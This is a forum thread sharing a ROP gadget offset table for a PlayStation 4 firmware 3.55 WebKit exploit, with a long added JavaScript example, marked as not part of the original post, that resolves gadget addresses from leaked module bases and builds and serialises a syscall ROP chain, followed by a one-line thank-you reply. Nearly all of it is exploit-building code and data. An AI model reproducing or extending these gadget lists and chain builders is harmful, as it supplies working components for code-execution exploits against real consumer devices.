
PS4 3.55 Updated and More Extensive Gadget List Code from Dragood2

by Snow - 10-09-2016 - 11:39 PM
#1
PS4 3.55 Updated and More Extensive Gadget List

Code:
// gadget(module, offset), VTABLE, WEBKIT2, LIBKERNEL and LIBC are supplied by the
// exploit framework this table is loaded into; they are not defined in this post.
// A gadget resolves to the leaked base of its module plus the offset.
gadgetMap = {
  'PlayStation 4 3.55': {
    // 3.55 gadgets located relative to the leaked WebKit vtable pointer (negative offsets)
    'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f),
    'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c),
    'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40),
    'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99),
    'syscall': new gadget(VTABLE, -0x3dc1a6),
    'mov rax, qword ptr [rax]': new gadget(VTABLE, -0x238e98d),

    // 1.76 gadgets updated with 3.55 locations (module base + offset)
    'pop rbp': new gadget(WEBKIT2, 0x2177),
    'pop rax': new gadget(WEBKIT2, 0x1c6ab),
    'pop rcx': new gadget(WEBKIT2, 0x3ca71b),
    'pop rdx': new gadget(WEBKIT2, 0x1afa),
    'pop rsi': new gadget(WEBKIT2, 0xb9ebb),
    'pop rdi': new gadget(WEBKIT2, 0x113991),
    'pop r8': new gadget(WEBKIT2, 0x1c6aa),
    'pop r9': new gadget(WEBKIT2, 0xee0a8f),
    'pop rsp': new gadget(WEBKIT2, 0x376850),

    'mov r10, rcx; syscall': new gadget(LIBKERNEL, 0x4b7),
    'mov [rax+0x1e8], rdx': new gadget(LIBKERNEL, 0x2032),

    // Entries marked "missing" are 1.76 gadgets (old byte-pattern form, with the
    // 1.76 module index where it was numeric) that have not been located in 3.55 yet.
    // 'mov [rax+0x60], rdi': new gadget([0x48, 0x89, 0x78, 0x60], WEBKIT2, 0x2b7274),  // missing
    //   (mov qword [rax+0x60], rdi ; ret)

    'mov [rax+0x8], rsi': new gadget(WEBKIT2, 0x5af574),
    // 'mov [rax+0xc0], rcx': new gadget([0x48, 0x89, 0x88, 0xc0, 0x00, 0x00, 0x00], WEBKIT2, 0x369e6d),  // missing
    'mov [rax], rcx': new gadget(WEBKIT2, 0x1129eee),
    // 'mov [rax], rdx': new gadget([0x48, 0x89, 0x10], WEBKIT2, 0x3579c0),  // missing
    'mov [rax], rsi': new gadget(WEBKIT2, 0x3d7a87),

    'mov [rax], dh': new gadget(WEBKIT2, 0x215ca8),

    'mov [rcx], rax': new gadget(WEBKIT2, 0x225814),
    'mov [rcx], rdx': new gadget(WEBKIT2, 0xbde080),

    'mov [rdx], rcx': new gadget(WEBKIT2, 0x40c889),
    'mov [rdx], rsi': new gadget(WEBKIT2, 0xf64a0f),

    'mov [rsi+0x18], rax': new gadget(WEBKIT2, 0x681f7),
    'mov [rsi+0x8], r8': new gadget(WEBKIT2, 0x25b67a),
    'mov [rsi], rcx': new gadget(WEBKIT2, 0x12390),

    'mov [rdi], rax': new gadget(WEBKIT2, 0x11fc37),
    // 'mov [rdi+0x88], rax': new gadget([0x48, 0x89, 0x87, 0x88, 0x00, 0x00, 0x00], WEBKIT2, 0x1c0e03),  // missing
    // 'mov [rdi+0xa0], rcx': new gadget([0x48, 0x89, 0x8f, 0xa0, 0x00, 0x00, 0x00], WEBKIT2, 0xb6b5),  // missing
    'mov [rdi+0x80], rdx': new gadget(WEBKIT2, 0x1153d24),
    'mov [rdi+0x80], rsi': new gadget(WEBKIT2, 0x3dc290),
    // 'mov [rdi+0x20], r8': new gadget([0x4c, 0x89, 0x47, 0x20], 12, 0x40415),  // missing
    'mov [rdi+0x20], rdx': new gadget(WEBKIT2, 0xb610b),

    // 'mov [r10], rdi': new gadget([0x49, 0x89, 0x3a], 16, 0x1ba44),  // missing
    // 'mov [r10], rdx': new gadget([0x49, 0x89, 0x12], 16, 0x1b79b),  // missing
    // 'mov [r10], rsi': new gadget([0x49, 0x89, 0x32], 16, 0x1b8cd),  // missing

    'mov rdi, [rdi+0x48]': new gadget(LIBC, 0x8e982),
    'mov rsi, rax; jmp rcx': new gadget(WEBKIT2, 0x1ac260),

    // 'mov rax, [rax+0x830]': new gadget([0x48, 0x8b, 0x80, 0x30, 0x08, 0x00, 0x00], 19, 0x1957),  // missing
    'mov rax, [rdi]': new gadget(WEBKIT2, 0xa0450),
    'mov rax, [rdi+0x18]': new gadget(WEBKIT2, 0x131000),
    // 'mov rax, [r10]': new gadget([0x49, 0x8b, 0x02], 16, 0xd93d),  // missing
    // 'mov rax, [r11]': new gadget([0x49, 0x8b, 0x03], 16, 0xd936),  // missing

    'mov rdx, [rdi+0x8]': new gadget(LIBC, 0x6973),

    'mov rax, rdi': new gadget(LIBC, 0x9480),
    'mov rax, rsi': new gadget(LIBC, 0xc3b4),
    'mov rax, r8': new gadget(LIBC, 0x70738),

    'mov rdx, rdi': new gadget(LIBC, 0x8a7f),

    'add ah, byte [rax]': new gadget(WEBKIT2, 0xf36798),
    'add edi, dword [rcx]': new gadget(WEBKIT2, 0xfcbffd),

    'call rax': new gadget(LIBKERNEL, 0x72),
    'call rbx': new gadget(LIBC, 0x9c50),
    'call rcx': new gadget(LIBC, 0x2f05),
    'call rdx': new gadget(LIBC, 0x9d5c9),
    'call rsi': new gadget(LIBC, 0x9d7d),

    'jmp rax': new gadget(LIBC, 0x92),
    'jmp rbx': new gadget(LIBC, 0x222f5),
    'jmp rcx': new gadget(LIBC, 0xb7cc),
    'jmp rdx': new gadget(LIBC, 0xb81c),

    'ret': new gadget(WEBKIT2, 0x1d0f),
  },
};
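The table above is only data: each entry is a (module, offset) pair that the exploit framework turns into an address once it has leaked the module bases, and the "missing" comments are a by-hand check that every gadget a chain needs is actually present. The example below, added here and not part of the original post or of Dragood2's code, shows that resolution step and a syscall chain built from a subset of the posted entries. The `Gadget` class, the module constants, the `bases` values, and the functions `missingGadgets`, `buildSyscallChain` and `chainToBytes` are all assumptions for illustration; the real framework's `gadget` constructor and leaked bases are not shown on this page.

```javascript
// Added example, not code from the original post. The Gadget class, module
// constants and base addresses are hypothetical stand-ins for whatever the
// exploit framework that consumes gadgetMap provides; only the
// (module, offset) pairs are taken from the posted 3.55 list.

const VTABLE = 'vtable';        // leaked vtable pointer; 3.55 entries are negative offsets from it
const WEBKIT2 = 'webkit2';
const LIBKERNEL = 'libkernel';
const LIBC = 'libc';

class Gadget {
  constructor(module, offset) {
    this.module = module;
    this.offset = BigInt(offset);   // keep 64-bit arithmetic exact
  }
  // Address = leaked base of the module + offset (negative for VTABLE entries).
  resolve(bases) {
    if (!(this.module in bases)) throw new Error(`no base leaked for ${this.module}`);
    return bases[this.module] + this.offset;
  }
}

// Constructed subset of the posted 3.55 table (same pairs as above).
const gadgetMap = {
  'PlayStation 4 3.55': {
    'syscall':               new Gadget(VTABLE,    -0x3dc1a6),
    'pop rax':               new Gadget(WEBKIT2,   0x1c6ab),
    'pop rcx':               new Gadget(WEBKIT2,   0x3ca71b),
    'pop rdx':               new Gadget(WEBKIT2,   0x1afa),
    'pop rsi':               new Gadget(WEBKIT2,   0xb9ebb),
    'pop rdi':               new Gadget(WEBKIT2,   0x113991),
    'mov r10, rcx; syscall': new Gadget(LIBKERNEL, 0x4b7),
    'ret':                   new Gadget(WEBKIT2,   0x1d0f),
  },
};

// Hypothetical bases, standing in for what the info leak supplies on a given
// boot. These are constructed values, not real PS4 addresses.
const bases = {
  [VTABLE]:    0x802400000n,
  [WEBKIT2]:   0x801000000n,
  [LIBKERNEL]: 0x803000000n,
  [LIBC]:      0x804000000n,
};

// Names in `wanted` that the table does not carry: the check the "missing"
// comments in the posted list perform by hand.
function missingGadgets(table, wanted) {
  return wanted.filter((name) => !(name in table));
}

// Build a raw syscall chain as 64-bit words in stack order. The PS4 kernel
// uses the FreeBSD amd64 convention: arguments in rdi, rsi, rdx, r10 and the
// number in rax. `syscall` clobbers rcx, so a 4th argument is loaded with
// 'pop rcx' and moved by the 'mov r10, rcx; syscall' gadget from the list.
function buildSyscallChain(table, bases, sysno, args) {
  const need = (name) => {
    if (!(name in table)) throw new Error(`gadget missing from table: ${name}`);
    return table[name].resolve(bases);
  };
  if (args.length > 4) throw new Error('at most 4 arguments are supported');
  const pops = ['pop rdi', 'pop rsi', 'pop rdx', 'pop rcx'];
  const chain = [];
  args.forEach((value, i) => chain.push(need(pops[i]), BigInt(value)));
  chain.push(need('pop rax'), BigInt(sysno));
  chain.push(need(args.length === 4 ? 'mov r10, rcx; syscall' : 'syscall'));
  return chain;
}

// Serialise the chain little-endian, as it would be laid out over the stack.
function chainToBytes(chain) {
  const out = new Uint8Array(chain.length * 8);
  chain.forEach((word, i) => {
    let w = BigInt.asUintN(64, word);
    for (let b = 0; b < 8; b++) { out[i * 8 + b] = Number(w & 0xffn); w >>= 8n; }
  });
  return out;
}

const hex = (v) => '0x' + v.toString(16);

if (typeof require !== 'undefined' && require.main === module) {
  const table = gadgetMap['PlayStation 4 3.55'];
  console.log('missing:', missingGadgets(table, ['pop rdi', 'mov [rax], rdx']));
  const chain = buildSyscallChain(table, bases, 4, [1, 0x1234, 5]);   // write(1, buf, 5)
  console.log(chain.map(hex).join(' '));
  console.log(chainToBytes(chain).length, 'bytes');
}
```

`buildSyscallChain` throws as soon as a name is absent from the table, so a chain that depends on one of the entries still commented out as "missing" fails at build time rather than jumping to a stale 1.76 offset.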
#2
(10-09-2016 - 11:39 PM)Snow Wrote:
PS4 3.55 Updated and More Extensive Gadget List

Thanks for sharing this code man, I appreciate it!